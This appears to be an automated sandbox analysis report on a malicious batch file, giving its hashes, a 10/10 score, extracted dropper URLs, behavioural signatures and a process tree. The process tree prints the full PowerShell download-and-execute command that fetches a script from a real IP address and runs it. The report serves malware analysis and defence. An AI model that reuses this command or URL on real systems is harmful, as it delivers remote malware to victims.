Analysis
-
max time kernel
115s -
max time network
152s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
11-02-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
eEqGBFWD.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
eEqGBFWD.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
eEqGBFWD.bat
-
Size
194B
-
MD5
5921814fde0e9a996f0dee5a45a865c9
-
SHA1
946b9d4f1081b053f9b90544dcc83367e7cfbc21
-
SHA256
bf894d6ef5402e0c90fd5cfc08bd271dc601d90abdf0f73bc8c17e5a2861918b
-
SHA512
5f953ff30984392246fde646a900d5d91eb93f64345da39fc91007c67e913ce5b7ea8f59a5e572de72fa1052877a1eb7082fc67a31f9f4f118dd40db88e33763
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/eEqGBFWD
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid process 2000 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2000 WerFault.exe Token: SeBackupPrivilege 2000 WerFault.exe Token: SeDebugPrivilege 2000 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
WerFault.exepid process 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe 2000 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\eEqGBFWD.bat"1⤵PID:5004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/eEqGBFWD');Invoke-LZNYLIOOLOW;Start-Sleep -s 10000"2⤵PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Enumerates system info in registry
PID:2000
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵PID:4732